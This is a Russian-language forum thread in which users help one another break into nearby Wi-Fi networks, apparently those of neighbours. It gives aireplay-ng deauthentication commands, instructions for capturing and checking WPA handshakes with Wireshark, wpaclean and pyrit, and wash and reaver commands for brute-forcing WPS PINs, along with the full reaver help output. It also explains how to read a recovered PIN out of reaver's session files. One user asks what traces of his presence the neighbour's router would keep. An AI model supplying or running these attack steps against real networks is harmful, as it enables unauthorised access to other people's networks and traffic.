Сколько запросов деатунтификации на точку отправляешь? Попробуй отправить штук... 50 =) у меня иногда с малым количеством пакетов не срабатывало, а побольше поставишь - глядишь, и получится. Code: aireplay-ng -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx [B]--deauth 50[/B] mon0 Фильтр в wireshark ставится так: над фреймом, где у тебя показываются пакеты, есть строка ввода, которая так и зовётся - Filters. Туда пишешь "eapol", нажимаешь "apply" или Enter, и фильтр начинает работу. Но тут есть нюанс: в идеале ты должен получить 4хэатпный хэндшейк (в описании пакетов долно быть написано msg 1/4, msg 2/4, msg 3/4, msg 4/4), но дело в том, что для работы впринципе хватит и первых двух пакетов (msg 1/4, msg 2/4). Важно, чтобы эти пакеты пришли друг за другом с минимальной задержкой (время получения пакетов от начала перехвата можно посмотреть в самой левой колонке в wireshark. Для нормального handshake это время, как правило, не превышает примерно 30 мс). Можно пойти и немного другим путём: использовать тулзу wpaclean из набора aircrack: Code: wpaclean <out.cap> <in.cap> где in.cap - имя входного файла, out.cap - имя выходного файла, очищенного от мусора. ВАЖНО: необходимо указывать сначала имя ВЫходного файла, а только затем входного, иначе программа ничего не сделает... Если в .cap-файде есть валидный хэндшейк, программка отработает и скажет, что всё ок, в противном случае пожалуется, что не хватает каких-то пакетов. О результатах просьба отписаться в топик =) P.S. Есть ещё один вариант - прога pyrit. Запускаем её следующим образом: Code: pyrit -r <Файл_с_handshake> analyze И пирит тебе выведет все точки доступа, данные которых были собраны в .cap-файл, плюс скажет, к каким точкам есть Handshake, от какого клиента он был получен, и насколько он работоспособный.
вот скрин, ни одного пакета по фильтру нету, может я что то не то сделал ..... я ставил и 50 и 100 и 500 и даже 1000 но результат тот же ни одного хендешника
Фильтр ты правильно включил. Ну, теоретически, конечно, может счётчик прибрёхивать... У меня, например, если сигнал слишком слабый, порой счётчик выдаёт уровень сигнала в районе -80 dBm, хотя на деле там -100 и меньше... Но вообще-то очень странно, что ты не можешь handshake получить... А reaver не пробовал? Не можешь поймать хэндшейк - попробуй в обход) сомневаюсь, что на всех 25 точках выключен WPS) Попробуй: Code: wash -i mon0 -C -s из полученного списка выбери точку с самым сильным и устойчивым сигналом и попробуй дальше так: Code: reaver -i mon0 -c xx:xx:xx:xx:xx:xx -vv Можешь поэкспериментировать с опциями также. Например, добавить -d 0 и -S - немножко побыстрее может пойти перебор. Станет хуже - уберёшь =) "Взлом - процесс творческий"©
насколько я правильно понял максимум какая инфа у соседа может остаться о моем присутствии по вай-фай- это мой мас-адрес и IP, и все?
вот что у меня получилось а дальше команду вводить вот эту ? Code: reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv если эту ввожу Code: reaver -i mon0 -c xx:xx:xx:xx:xx:xx -vv то плучется следующее Code: root@bt:~# reaver -i mon0 -c 34:08:04:D3:0B:6E -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Switching mon0 to channel 34 Required Arguments: -i, --interface=<wlan> Name of the monitor-mode interface to use -b, --bssid=<mac> BSSID of the target AP Optional Arguments: -m, --mac=<mac> MAC of the host system -e, --essid=<ssid> ESSID of the target AP -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) -o, --out-file=<file> Send output to a log file [stdout] -s, --session=<file> Restore a previous session file -C, --exec=<command> Execute the supplied command upon successful pin recovery -D, --daemonize Daemonize reaver -a, --auto Auto detect the best advanced options for the target AP -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout period [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False] Example: reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv root@bt:~#
Да, и то скорее МАС-адрес, чем IP. Хотя он будет какое-то время храниться, но он будет "серый" - это раз, и храниться айпишник будет в зависимости он настроек обновления ARP-таблиц. morgan-id, прости плз, по привычке с airodump-ng указал тебе не ту опцию) Вот ввод: Code: reaver -i mon0 -b <МАС_точки> -с <канал_точки> -vv
все сделал как ты написал )) а это я поймаю сам ключ от точки ? и как я узнаю что ключ уже пойман, в логах где ни будь это есть ?
Если время есть, и внимательно читать соответствующие разделы сайта, ответы есть. По факту : если reaver трудится как положено (т.е без ошибок), через какое то время при удачном подборе PIN он останавливает свою черную деятельность. Вам нужны последние три строки Code: [+] WPS PIN: '44522674 (сам пин конечно)' [+] WPA PSK: 'Здесь ключ к AP' [+] AP SSID: 'ESSID точки'
у меня были эти 3 последние строки, но я закрыл консоль, теперь по новой брутить или есть в логах посмотреть ? BackTrack не перегружал, только заново сейчас запущен reaver
уже по новой 3 часа брутит и ни чего пака еще я тот ривер консоль свернул в трее а найти не могу нету в трее его
Дык... Alt-tab пробовал?))) А вообще странно, что у тебя по-новой перебор пошёл... Грузил Бэктрэк с liveusb? Если да, то перезагружал ли комп?
Рискну предположить что грузились Вы с диска? У меня BT стоит второй ОС, был подобный случай, после запуска повторно reaver-а выдал мгновенно последнее... перезапускал reaver с теми же параметрами что и в первый заход. про liveCD H3L1X опередил
у меня на VMware установлен BackTrack5, не с liveCD гружу, гружу с жесткого диска на VMware Alt-tab пробовал но нету той консоли, видимо я ее закрыл совсем ))))))) но вот пробрутил я ту же точку 8 часов с теми же параметрами но ни чего мне не выдало сейчас запущу и до утра может и поймаю снова а в чем разница между этими двумя командами, "-с" с маленькой буквы и "-С" с большой буквы ? Code: wash -i mon0 -c -s wash -i mon0 -C -s если писать с маленькой буквы "-с" у меня отображается только одна точка, а если с большой "-С" то 5 точек
если маленькая -с то это канал подпиши канал и она будет показывать только его а с большой все каналы по поводу закрытия какая у тебе версия reaver ? сохранения работают вроде в 1.4
Вообще-то, можно =) есть в /usr/local/etc/reaver кучка файлов с именами типа xxxxxxxxxxxx.wpc, которые открываются обычным gedit'ом. В файлах этих цифири непонятные. Так вот, ищи файл, имя которого повторяет МАС-адрес точки доступа, которая тебя интересует. Тебе нужны первые 3 строки. 1 строка - первая половина пина + 11. Всё дело в том, что ривер в самом начале проверяет стандартные четвёрки первой половины пина, которых 12 штук, но нумерация идёт с нуля) Поэтому чтобы узнать первую половину пина, отними от первого в файле числа 11 (К примеру, первой строкой стоит число 15. Вычитаем 11, поучаем 4. Значит, первая половина пин-кода - 0004). 2 строка - вторая половинка пин-кода. Вторую часть файла составляет список комбинаций из трёх цифр для перебора второй половины пин-кода. Положению нужной тебе комбинации цифр во второй половине файла соответствует вторая строка минус 9 (Например, второй строкой значится 3. Ищем четвёртую по счёту строчку среди комбинаций из трёх цифр - 333. Или, скажем, 14. Тогда второй половинкой пин-кода будет 005). 3 строка - контрольная сумма. Альтернатива поиска пин-кода - посчитать вручную =) То есть найти числа, стоящие на указанных позициях =) Только не забывайте, что первый по счёту элемент - нулевой =)